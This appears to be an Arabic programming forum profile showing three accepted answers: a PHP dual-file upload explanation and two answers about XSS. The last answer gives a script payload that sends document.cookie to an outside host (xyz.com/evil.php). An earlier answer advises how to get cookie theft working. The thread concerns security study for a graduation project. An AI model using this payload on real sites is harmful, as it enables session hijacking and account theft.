-
المساهمات
26 -
تاريخ الانضمام
-
تاريخ آخر زيارة
-
عدد الأيام التي تصدر بها
2
إجابات الأسئلة
-
إجابة Shadi Habbal سؤال في مساعدة في معرفة الخطأ في الكود كانت الإجابة المقبولة
السلام عليكم،
تأكد من أنك بداية لا تستخدم أي إضافة أو مكافح فيروسات قد يمنع تنفيذ شفرات XSS كنوع من الحماية (مثل NoScript وسواها).
الرابط الخاص بموقعك لا يعمل، يبدو أن الاستضافة قامت بحظره أو إزالته.
قم أيضًا بوضع قيمة للـ cookie في المستند قبل محاولة سرقتها.. الصفحة بشكل افتراضي لا تملك أي cookie فمن الطبيعي ألا تحصل على أي قيمة
لا تنس الاطلاع أيضًا على جوابي في سؤالك السابق حول الاستغلال بدون استخدام document.location
-
إجابة Shadi Habbal سؤال في مشكلة في رفع ملفين في نفس الوقت [PHP]؟ كانت الإجابة المقبولة
استخدم التالي لإنشاء حقلين لإدخال الملفات في جهة العميل
<form id="upload" method="post" action="" enctype="multipart/form-data"> <div id="drop"> Drop Here <a>صورة</a> <input type="file" name="up[]" id="file1" multiple /> <input type="file" name="up[]" id="file2" multiple /> </div> <ul> <!-- The file uploads will be shown here --> </ul> </form> كما تلاحظ، لقد قمت باستخدام مصفوفة بنفس الاسم في الـ name attribute للحقلين.
الآن من جهة PHP سيكون بإمكانك الوصول لمواصفات الملف الأول عبر:
$_FILES['up']['name'][], $_FILES['up']['tmp_name'][], $_FILES['up']['size'][], $_FILES['up']['type'][] وللملف الثاني
$_FILES['up']['name'][1], $_FILES['up']['tmp_name'][1], $_FILES['up']['size'][1], $_FILES['up']['type'][1] تذكّر بأننا نتعامل مع مصفوفة، فالـ index=0 يمثّل الملف file1 والـ index=1 يمثّل الملف file2 دومًا لأن هذا هو الترتيب الذي حدّدناه في جهة HTML.
السلام عليكم ورحمة الله وبركاته.
-
إجابة Shadi Habbal سؤال في أبحث عن طرق استغلال لثغرة أمان بغرض مشروع تخرج؟ كانت الإجابة المقبولة
السلام عليكم
يمكنك حقن التالي في الحالتين وسيتم التنفيذ عند عرض الصفحة.
ملاحظة: الـ alert() موجود فقط للإشارة إلى نجاح تنفيذ الثغرة.
<script>img=new Image();img.onerror = function() {alert('XSS executed')};img.src="http://xyz.com/evil.php?cookie="+document.cookie;</script> خذ بعين الاعتبار أنك لم تعرض لنا رابط مشروعك لنختبر الحقن عليه قبل الإجابة، علمًا أن شرحك للمشكلة متشابك وغير واضح تمامًا.
والسلام عليكم ورحمة الله وبركاته